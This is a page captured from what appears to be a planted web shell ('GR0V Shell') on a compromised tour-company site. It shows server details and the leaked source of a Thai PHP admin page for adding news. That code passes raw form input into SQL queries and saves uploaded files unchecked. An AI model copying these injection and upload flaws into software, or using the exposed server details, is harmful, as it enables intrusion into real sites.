? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/promice/Admin/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/promice/Admin/Newss.php

<?
@session_start();
ob_start();
$useradmin = $_SESSION["useradmin"];
if(empty($useradmin)) 
{
echo "<script>alert('หน้านี้จำกัดเฉพาะ Admin เท่านั้น');history.back();</script>";
exit();
}
require_once "../include/tdate.php";
require_once "../include/connect.php";
require_once "../include/connectdb.php";

						  $sql="select * from useradmin where useradmin='$useradmin'";
						  $db_query=mysql_db_query($db,$sql);
						  $result=mysql_fetch_array($db_query);
						  $id=$result[id];
						  $adminname=$result[name];
						  $user_admin=$result[useradmin];
						  $pass_admin=$result[passadmin];
?>
<html>
<head>
<title><? echo "$headtxt"; ?></title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<!-- Fireworks MX Dreamweaver MX target.  Created Sat Apr 02 10:29:23 GMT+0700 (SE Asia Standard Time) 2011-->
</head>
<link rel="stylesheet" type="text/css" href="../editor/styles.css" />
    <link rel="stylesheet" type="text/css" href="../editor/jquery.cleditor.css" />
    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
    <script type="text/javascript" src="../editor/jquery.cleditor.min.js"></script>

    <script type="text/javascript">
      $(document).ready(function() {
        $(".input").cleditor({width:700, height:300})[0].focus();
      });
    </script>

<body bgcolor="#ffffff">
<div align="center"><strong> 
  </strong>
  <table width="89%" border="0" align="center" cellpadding="1" cellspacing="1">
    <tr valign="top"> 
      <td width="57%"><? echo "$headtxt | $e_date $etime"; ?><br>
        <div align="left">หน้าปัจจุบันของคุณ : 
          <a href="Main.php">หน้าหลัก</a> --&gt; 
          <strong>เพิ่มข่าวสาร</strong></div></td>
      <td width="43%"> <div align="right">ยินดีต้อนรับคุณ 
          <? echo "<u>$adminname</u>"; ?> เข้าใช้งานในระบบ<br>
          [ <a href="ChangePass.php">เปลี่ยนรหัสผ่าน</a> 
          ] <a href="logout.php">ออกจากระบบ</a> </div></td>
    </tr>
    <tr> 
      <td colspan="2"><table width="100%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#E9E9E6">
          <tr> 
            <td><div align="center"> 
                <table width="100%" border="0" cellspacing="1" cellpadding="1">
                  <tr> 
                    <td><div align="center"><br>
                        <table width="60%" border="0" cellspacing="1" cellpadding="1">
                          <tr> 


<td width="736" valign="top">
        <link rel="shortcut icon" type="../editor/image/x-icon" href="../favicon.ico">
<link rel="stylesheet" type="text/css" href="../editor/styles.css" />
    <link rel="stylesheet" type="text/css" href="../editor/jquery.cleditor.css" />
    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
    <script type="text/javascript" src="../editor/jquery.cleditor.min.js"></script>

    <script type="text/javascript">
      $(document).ready(function() {
        $("#input").cleditor({width:700, height:300})[0].focus();
      });
    </script>
   
     <div class=mainPanel>
      <div class=leftPanel>
<? if($_POST[Submit] == "เพิ่มข่าว"){
if($_POST[title]!="" && $_POST[input] != ""){
$today=date("Y-m-d H:i:s");

		 $pic1 = $_FILES['pro_pic']['name'];
		 $tmp1 = $_FILES['pro_pic']['tmp_name']; 
		 if(copy($tmp1,"../img/".$time."_".$pic1)){ $_POST[pro_pic]= $time."_".$pic1;}
$sql1="insert into news values('','$_POST[title]','$_POST[input]','$today','$p_img')";
mysql_query($sql1);
 echo '<script> alert("เรียบร้อย");</script>';
}else{ echo '<script> alert("ล้างค่า");</script>';
}}
?><br />

<span style="color: #0000FF;font-size:12px"><a href="new.php">รายการข่าว</a> >> เพิ่ม/แก้ไข<br />
<br />

<? if($_GET[status]=="add"){?>
ประกาศข่าววันที่ <? echo date("Y/m/d");?></span>
<form id="form2" name="form2" method="post" action="">
        <table width="200" border="0">
          <tr>
            <td>หัวข้อ
              <label><input name="title" type="text" id="title" size="90" />
              </label></td>
          </tr>
          <tr>
            <td><input name="p_img" id="email" type="file" 
                        tabindex="2" /></td>
          </tr>
          <tr>
            <td>  <textarea id="input" name="input" ></textarea></td>
          </tr>
          <tr>
            <td><label>
              <input type="submit" name="Submit" id="Submit" value="เพิ่มข่าว" />
              <input type="reset" name="reset" id="reset" value="ยกเลิก" />
            </label></td>
          </tr>
        </table>
       </form></td>
                          </tr>
                          <tr> 
                            <td><table width="100%" border="0" cellspacing="1" cellpadding="1">
                                <tr> 
                                  <td><strong>:: 
                                    รายการข่าวสาร :: <a href="news1.php?status=add">เพิ่มข่าว</a></strong></td>
                                </tr>
                                <tr> 
                                  <td><div align="center"> 
                                      <table width="62%" border="0" cellspacing="0" cellpadding="0">
                                        <tr class="jobscss"> 
                                          <td bgcolor="#FFFFFF"> 
                                            <?
$page = $_GET['page'];

$select_type="select * from news  order by id asc";
$query_select=mysql_query($select_type);
$num_rows=mysql_num_rows($query_select);

if($num_rows<1){
echo "<br><br><center><b>ยังไม่มีการเพิ่มข้อมูลค่ะ</b></center>";
}else{
		$select="select * from news  order by id asc";
		$q_ry = mysql_query($select);
	 	$num_rows=mysql_num_rows($q_ry);
  		$pagesize=20;
		$rt=$num_rows%$pagesize;
		if($rt!=0)
			{
				$totalpage=floor($num_rows/$pagesize)+1;
			}
		else
			{
				$totalpage=floor($num_rows/$pagesize);
				$toppic_id=1;
			}
		if(empty($page))
			{
				$page=1;
			}
		mysql_free_result($q_ry);
		$goto=($page-1)*$pagesize;
$sql_select_mem="Select * From news  order by id asc limit $goto,$pagesize";
		$fect=mysql_query($sql_select_mem);
		if(!$fect)
		{
		("ติดต่อฐานข้อมูลไม่ได้".mysql_error());
		exit;
		}

	  $bgcount=0;
	while($rows=mysql_fetch_array($fect))
	{
$idx =$rows['id'];
$topic  =$rows['topic'];
$message = $rows['message'];
$bgcount=$bgcount+1;
$bgmod=$bgcount%2;
if($bgmod==0){
	$bgcolor="#E9E9E8";
}else{
	$bgcolor="#FFFFFF";
}
	?>
                                            <table width="100%" border="0" cellspacing="1" cellpadding="1">
                                              <tr> 
                                                <td width="559"> <div align="left"></div>
                                                  <div align="left"></div>
                                                  <div align="center"> </div>
                                                  <div align="left"><img src="../images/icon_02.jpg" width="10" height="10"> 
                                                    <? echo "$topic"; ?></div></td>
                                                <td width="136"> <div align="center"> 
                                                    <table width="80" border="0" cellspacing="1" cellpadding="1">
                                                      <tr> 
                                                        <td width="72"><div align="center"><a href="news1.php?status=edit&id=<? echo "$idx"; ?>"><img src="../images/pencil.jpg" width="20" height="20" border="0"></a></div></td>
                                                        <td width="72"><div align="center"><a href="DelNews.php?NewsID=<? echo "$idx"; ?>"><img src="../images/delete.png" width="22" height="22" border="0"></a></div></td>
                                                      </tr>
                                                    </table>
                                                  </div></td>
                                                <td width="53">แก้ไข</td>
                                              </tr>
                                            </table>
                                            <?
}
}
?>
                                          </td>
                                        </tr>
                                        <tr class="jobscss"> 
                                          <td height="19">&nbsp;</td>
                                        </tr>
                                        <tr class="jobscss"> 
                                          <td><strong><span class="maekhawtom">หน้าที่ 
                                            :</span></strong> <span class="maekhawtom"> 
                                            <? 
	for($i=1;$i<$page;$i++)
	{
	echo"[<a href='$PHP_SELF?page=$i'>$i</a>]";
	}
	echo"[<b>$page</b>]";
	for($i=$page+1;$i<=$totalpage;$i++)
	{
	echo"[<a href='$PHP_SELF?page=$i'>$i</a>]";
	}
	?>
                                            </span><span class="maekhawtom"> 
                                            </span></td>
                                        </tr>
                                        <tr> 
                                          <td><div align="center"></div></td>
                                        </tr>
                                      </table>
                                    </div></td>
                                </tr>
                              </table></td>
                          </tr>
                        </table>
                        <br>
                        <br>
                      </div></td>
                  </tr>
                </table>
              </div></td>
          </tr>
        </table></td>
    </tr>
    <tr> 
      <td colspan="2"><div align="center"><br>
          <? echo "$buttomtxt"; ?> </div></td>
    </tr>
  </table>
  
</div>
</body>
</html>

T1KUS90T
  root-grov@210.1.60.28:~$